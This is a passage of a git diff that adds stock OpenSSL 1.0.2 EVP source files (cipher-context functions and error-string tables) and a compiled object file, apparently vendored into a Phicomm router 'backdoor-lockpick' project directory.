+        ctx->flags &= ~EVP_CIPH_NO_PADDING;
+    else
+        ctx->flags |= EVP_CIPH_NO_PADDING;
+    return 1;
+}
+
+int EVP_CIPHER_CTX_ctrl(EVP_CIPHER_CTX *ctx, int type, int arg, void *ptr)
+{
+    int ret;
+    if (!ctx->cipher) {
+        EVPerr(EVP_F_EVP_CIPHER_CTX_CTRL, EVP_R_NO_CIPHER_SET);
+        return 0;
+    }
+
+    if (!ctx->cipher->ctrl) {
+        EVPerr(EVP_F_EVP_CIPHER_CTX_CTRL, EVP_R_CTRL_NOT_IMPLEMENTED);
+        return 0;
+    }
+
+    ret = ctx->cipher->ctrl(ctx, type, arg, ptr);
+    if (ret == -1) {
+        EVPerr(EVP_F_EVP_CIPHER_CTX_CTRL,
+               EVP_R_CTRL_OPERATION_NOT_IMPLEMENTED);
+        return 0;
+    }
+    return ret;
+}
+
+int EVP_CIPHER_CTX_rand_key(EVP_CIPHER_CTX *ctx, unsigned char *key)
+{
+    if (ctx->cipher->flags & EVP_CIPH_RAND_KEY)
+        return EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_RAND_KEY, 0, key);
+    if (RAND_bytes(key, ctx->key_len) <= 0)
+        return 0;
+    return 1;
+}
+
+int EVP_CIPHER_CTX_copy(EVP_CIPHER_CTX *out, const EVP_CIPHER_CTX *in)
+{
+    if ((in == NULL) || (in->cipher == NULL)) {
+        EVPerr(EVP_F_EVP_CIPHER_CTX_COPY, EVP_R_INPUT_NOT_INITIALIZED);
+        return 0;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    /* Make sure it's safe to copy a cipher context using an ENGINE */
+    if (in->engine && !ENGINE_init(in->engine)) {
+        EVPerr(EVP_F_EVP_CIPHER_CTX_COPY, ERR_R_ENGINE_LIB);
+        return 0;
+    }
+#endif
+
+    EVP_CIPHER_CTX_cleanup(out);
+    memcpy(out, in, sizeof *out);
+
+    if (in->cipher_data && in->cipher->ctx_size) {
+        out->cipher_data = OPENSSL_malloc(in->cipher->ctx_size);
+        if (!out->cipher_data) {
+            EVPerr(EVP_F_EVP_CIPHER_CTX_COPY, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        memcpy(out->cipher_data, in->cipher_data, in->cipher->ctx_size);
+    }
+
+    if (in->cipher->flags & EVP_CIPH_CUSTOM_COPY)
+        return in->cipher->ctrl((EVP_CIPHER_CTX *)in, EVP_CTRL_COPY, 0, out);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..9e76ee4212d4dd02c1d06aa489913be93158076a
GIT binary patch
literal 8752
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_err.c
new file mode 100644
index 0000000..15cf553
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_err.c
@@ -0,0 +1,254 @@
+/* crypto/evp/evp_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_EVP,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_EVP,0,reason)
+
+static ERR_STRING_DATA EVP_str_functs[] = {
+    {ERR_FUNC(EVP_F_AESNI_INIT_KEY), "AESNI_INIT_KEY"},
+    {ERR_FUNC(EVP_F_AESNI_XTS_CIPHER), "AESNI_XTS_CIPHER"},
+    {ERR_FUNC(EVP_F_AES_INIT_KEY), "AES_INIT_KEY"},
+    {ERR_FUNC(EVP_F_AES_T4_INIT_KEY), "AES_T4_INIT_KEY"},
+    {ERR_FUNC(EVP_F_AES_XTS), "AES_XTS"},
+    {ERR_FUNC(EVP_F_AES_XTS_CIPHER), "AES_XTS_CIPHER"},
+    {ERR_FUNC(EVP_F_ALG_MODULE_INIT), "ALG_MODULE_INIT"},
+    {ERR_FUNC(EVP_F_CAMELLIA_INIT_KEY), "CAMELLIA_INIT_KEY"},
+    {ERR_FUNC(EVP_F_CMAC_INIT), "CMAC_INIT"},
+    {ERR_FUNC(EVP_F_CMLL_T4_INIT_KEY), "CMLL_T4_INIT_KEY"},
+    {ERR_FUNC(EVP_F_D2I_PKEY), "D2I_PKEY"},
+    {ERR_FUNC(EVP_F_DO_SIGVER_INIT), "DO_SIGVER_INIT"},
+    {ERR_FUNC(EVP_F_DSAPKEY2PKCS8), "DSAPKEY2PKCS8"},
+    {ERR_FUNC(EVP_F_DSA_PKEY2PKCS8), "DSA_PKEY2PKCS8"},
+    {ERR_FUNC(EVP_F_ECDSA_PKEY2PKCS8), "ECDSA_PKEY2PKCS8"},
+    {ERR_FUNC(EVP_F_ECKEY_PKEY2PKCS8), "ECKEY_PKEY2PKCS8"},
+    {ERR_FUNC(EVP_F_EVP_CIPHERINIT_EX), "EVP_CipherInit_ex"},
+    {ERR_FUNC(EVP_F_EVP_CIPHER_CTX_COPY), "EVP_CIPHER_CTX_copy"},
+    {ERR_FUNC(EVP_F_EVP_CIPHER_CTX_CTRL), "EVP_CIPHER_CTX_ctrl"},
+    {ERR_FUNC(EVP_F_EVP_CIPHER_CTX_SET_KEY_LENGTH),
+     "EVP_CIPHER_CTX_set_key_length"},
+    {ERR_FUNC(EVP_F_EVP_DECRYPTFINAL_EX), "EVP_DecryptFinal_ex"},
+    {ERR_FUNC(EVP_F_EVP_DIGESTINIT_EX), "EVP_DigestInit_ex"},
+    {ERR_FUNC(EVP_F_EVP_ENCRYPTFINAL_EX), "EVP_EncryptFinal_ex"},
+    {ERR_FUNC(EVP_F_EVP_MD_CTX_COPY_EX), "EVP_MD_CTX_copy_ex"},
+    {ERR_FUNC(EVP_F_EVP_MD_SIZE), "EVP_MD_size"},
+    {ERR_FUNC(EVP_F_EVP_OPENINIT), "EVP_OpenInit"},
+    {ERR_FUNC(EVP_F_EVP_PBE_ALG_ADD), "EVP_PBE_alg_add"},
+    {ERR_FUNC(EVP_F_EVP_PBE_ALG_ADD_TYPE), "EVP_PBE_alg_add_type"},
+    {ERR_FUNC(EVP_F_EVP_PBE_CIPHERINIT), "EVP_PBE_CipherInit"},
+    {ERR_FUNC(EVP_F_EVP_PKCS82PKEY), "EVP_PKCS82PKEY"},
+    {ERR_FUNC(EVP_F_EVP_PKCS82PKEY_BROKEN), "EVP_PKCS82PKEY_BROKEN"},
+    {ERR_FUNC(EVP_F_EVP_PKEY2PKCS8_BROKEN), "EVP_PKEY2PKCS8_broken"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_COPY_PARAMETERS), "EVP_PKEY_copy_parameters"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_CTX_CTRL), "EVP_PKEY_CTX_ctrl"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_CTX_CTRL_STR), "EVP_PKEY_CTX_ctrl_str"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_CTX_DUP), "EVP_PKEY_CTX_dup"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_DECRYPT), "EVP_PKEY_decrypt"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_DECRYPT_INIT), "EVP_PKEY_decrypt_init"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_DECRYPT_OLD), "EVP_PKEY_decrypt_old"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_DERIVE), "EVP_PKEY_derive"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_DERIVE_INIT), "EVP_PKEY_derive_init"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_DERIVE_SET_PEER), "EVP_PKEY_derive_set_peer"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_ENCRYPT), "EVP_PKEY_encrypt"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_ENCRYPT_INIT), "EVP_PKEY_encrypt_init"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_ENCRYPT_OLD), "EVP_PKEY_encrypt_old"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_GET1_DH), "EVP_PKEY_get1_DH"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_GET1_DSA), "EVP_PKEY_get1_DSA"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_GET1_ECDSA), "EVP_PKEY_GET1_ECDSA"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_GET1_EC_KEY), "EVP_PKEY_get1_EC_KEY"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_GET1_RSA), "EVP_PKEY_get1_RSA"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_KEYGEN), "EVP_PKEY_keygen"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_KEYGEN_INIT), "EVP_PKEY_keygen_init"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_NEW), "EVP_PKEY_new"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_PARAMGEN), "EVP_PKEY_paramgen"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_PARAMGEN_INIT), "EVP_PKEY_paramgen_init"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_SIGN), "EVP_PKEY_sign"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_SIGN_INIT), "EVP_PKEY_sign_init"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_VERIFY), "EVP_PKEY_verify"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_VERIFY_INIT), "EVP_PKEY_verify_init"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_VERIFY_RECOVER), "EVP_PKEY_verify_recover"},
+    {ERR_FUNC(EVP_F_EVP_PKEY_VERIFY_RECOVER_INIT),
+     "EVP_PKEY_verify_recover_init"},
+    {ERR_FUNC(EVP_F_EVP_RIJNDAEL), "EVP_RIJNDAEL"},
+    {ERR_FUNC(EVP_F_EVP_SIGNFINAL), "EVP_SignFinal"},
+    {ERR_FUNC(EVP_F_EVP_VERIFYFINAL), "EVP_VerifyFinal"},
+    {ERR_FUNC(EVP_F_FIPS_CIPHERINIT), "FIPS_CIPHERINIT"},
+    {ERR_FUNC(EVP_F_FIPS_CIPHER_CTX_COPY), "FIPS_CIPHER_CTX_COPY"},
+    {ERR_FUNC(EVP_F_FIPS_CIPHER_CTX_CTRL), "FIPS_CIPHER_CTX_CTRL"},
+    {ERR_FUNC(EVP_F_FIPS_CIPHER_CTX_SET_KEY_LENGTH),
+     "FIPS_CIPHER_CTX_SET_KEY_LENGTH"},
+    {ERR_FUNC(EVP_F_FIPS_DIGESTINIT), "FIPS_DIGESTINIT"},
+    {ERR_FUNC(EVP_F_FIPS_MD_CTX_COPY), "FIPS_MD_CTX_COPY"},
+    {ERR_FUNC(EVP_F_HMAC_INIT_EX), "HMAC_Init_ex"},
+    {ERR_FUNC(EVP_F_INT_CTX_NEW), "INT_CTX_NEW"},
+    {ERR_FUNC(EVP_F_PKCS5_PBE_KEYIVGEN), "PKCS5_PBE_keyivgen"},
+    {ERR_FUNC(EVP_F_PKCS5_V2_PBE_KEYIVGEN), "PKCS5_v2_PBE_keyivgen"},
+    {ERR_FUNC(EVP_F_PKCS5_V2_PBKDF2_KEYIVGEN), "PKCS5_V2_PBKDF2_KEYIVGEN"},
+    {ERR_FUNC(EVP_F_PKCS8_SET_BROKEN), "PKCS8_set_broken"},
+    {ERR_FUNC(EVP_F_PKEY_SET_TYPE), "PKEY_SET_TYPE"},
+    {ERR_FUNC(EVP_F_RC2_MAGIC_TO_METH), "RC2_MAGIC_TO_METH"},
+    {ERR_FUNC(EVP_F_RC5_CTRL), "RC5_CTRL"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA EVP_str_reasons[] = {
+    {ERR_REASON(EVP_R_AES_IV_SETUP_FAILED), "aes iv setup failed"},
+    {ERR_REASON(EVP_R_AES_KEY_SETUP_FAILED), "aes key setup failed"},
+    {ERR_REASON(EVP_R_ASN1_LIB), "asn1 lib"},
+    {ERR_REASON(EVP_R_BAD_BLOCK_LENGTH), "bad block length"},
+    {ERR_REASON(EVP_R_BAD_DECRYPT), "bad decrypt"},
+    {ERR_REASON(EVP_R_BAD_KEY_LENGTH), "bad key length"},
+    {ERR_REASON(EVP_R_BN_DECODE_ERROR), "bn decode error"},
+    {ERR_REASON(EVP_R_BN_PUBKEY_ERROR), "bn pubkey error"},
+    {ERR_REASON(EVP_R_BUFFER_TOO_SMALL), "buffer too small"},
+    {ERR_REASON(EVP_R_CAMELLIA_KEY_SETUP_FAILED),
+     "camellia key setup failed"},
+    {ERR_REASON(EVP_R_CIPHER_PARAMETER_ERROR), "cipher parameter error"},
+    {ERR_REASON(EVP_R_COMMAND_NOT_SUPPORTED), "command not supported"},
+    {ERR_REASON(EVP_R_CTRL_NOT_IMPLEMENTED), "ctrl not implemented"},
+    {ERR_REASON(EVP_R_CTRL_OPERATION_NOT_IMPLEMENTED),
+     "ctrl operation not implemented"},
+    {ERR_REASON(EVP_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH),
+     "data not multiple of block length"},
+    {ERR_REASON(EVP_R_DECODE_ERROR), "decode error"},
+    {ERR_REASON(EVP_R_DIFFERENT_KEY_TYPES), "different key types"},
+    {ERR_REASON(EVP_R_DIFFERENT_PARAMETERS), "different parameters"},
+    {ERR_REASON(EVP_R_DISABLED_FOR_FIPS), "disabled for fips"},
+    {ERR_REASON(EVP_R_ENCODE_ERROR), "encode error"},
+    {ERR_REASON(EVP_R_ERROR_LOADING_SECTION), "error loading section"},
+    {ERR_REASON(EVP_R_ERROR_SETTING_FIPS_MODE), "error setting fips mode"},
+    {ERR_REASON(EVP_R_EVP_PBE_CIPHERINIT_ERROR), "evp pbe cipherinit error"},
+    {ERR_REASON(EVP_R_EXPECTING_AN_RSA_KEY), "expecting an rsa key"},
+    {ERR_REASON(EVP_R_EXPECTING_A_DH_KEY), "expecting a dh key"},
+    {ERR_REASON(EVP_R_EXPECTING_A_DSA_KEY), "expecting a dsa key"},
+    {ERR_REASON(EVP_R_EXPECTING_A_ECDSA_KEY), "expecting a ecdsa key"},
+    {ERR_REASON(EVP_R_EXPECTING_A_EC_KEY), "expecting a ec key"},
+    {ERR_REASON(EVP_R_FIPS_MODE_NOT_SUPPORTED), "fips mode not supported"},
+    {ERR_REASON(EVP_R_INITIALIZATION_ERROR), "initialization error"},
+    {ERR_REASON(EVP_R_INPUT_NOT_INITIALIZED), "input not initialized"},
+    {ERR_REASON(EVP_R_INVALID_DIGEST), "invalid digest"},
+    {ERR_REASON(EVP_R_INVALID_FIPS_MODE), "invalid fips mode"},
+    {ERR_REASON(EVP_R_INVALID_KEY_LENGTH), "invalid key length"},
+    {ERR_REASON(EVP_R_INVALID_OPERATION), "invalid operation"},
+    {ERR_REASON(EVP_R_IV_TOO_LARGE), "iv too large"},
+    {ERR_REASON(EVP_R_KEYGEN_FAILURE), "keygen failure"},
+    {ERR_REASON(EVP_R_MESSAGE_DIGEST_IS_NULL), "message digest is null"},
+    {ERR_REASON(EVP_R_METHOD_NOT_SUPPORTED), "method not supported"},
+    {ERR_REASON(EVP_R_MISSING_PARAMETERS), "missing parameters"},
+    {ERR_REASON(EVP_R_NO_CIPHER_SET), "no cipher set"},
+    {ERR_REASON(EVP_R_NO_DEFAULT_DIGEST), "no default digest"},
+    {ERR_REASON(EVP_R_NO_DIGEST_SET), "no digest set"},
+    {ERR_REASON(EVP_R_NO_DSA_PARAMETERS), "no dsa parameters"},
+    {ERR_REASON(EVP_R_NO_KEY_SET), "no key set"},
+    {ERR_REASON(EVP_R_NO_OPERATION_SET), "no operation set"},
+    {ERR_REASON(EVP_R_NO_SIGN_FUNCTION_CONFIGURED),
+     "no sign function configured"},
+    {ERR_REASON(EVP_R_NO_VERIFY_FUNCTION_CONFIGURED),
+     "no verify function configured"},
+    {ERR_REASON(EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE),
+     "operation not supported for this keytype"},
+    {ERR_REASON(EVP_R_OPERATON_NOT_INITIALIZED), "operaton not initialized"},
+    {ERR_REASON(EVP_R_PKCS8_UNKNOWN_BROKEN_TYPE),
+     "pkcs8 unknown broken type"},
+    {ERR_REASON(EVP_R_PRIVATE_KEY_DECODE_ERROR), "private key decode error"},
+    {ERR_REASON(EVP_R_PRIVATE_KEY_ENCODE_ERROR), "private key encode error"},
+    {ERR_REASON(EVP_R_PUBLIC_KEY_NOT_RSA), "public key not rsa"},
+    {ERR_REASON(EVP_R_TOO_LARGE), "too large"},
+    {ERR_REASON(EVP_R_UNKNOWN_CIPHER), "unknown cipher"},
+    {ERR_REASON(EVP_R_UNKNOWN_DIGEST), "unknown digest"},
+    {ERR_REASON(EVP_R_UNKNOWN_OPTION), "unknown option"},
+    {ERR_REASON(EVP_R_UNKNOWN_PBE_ALGORITHM), "unknown pbe algorithm"},
+    {ERR_REASON(EVP_R_UNSUPORTED_NUMBER_OF_ROUNDS),
+     "unsuported number of rounds"},
+    {ERR_REASON(EVP_R_UNSUPPORTED_ALGORITHM), "unsupported algorithm"},
+    {ERR_REASON(EVP_R_UNSUPPORTED_CIPHER), "unsupported cipher"},
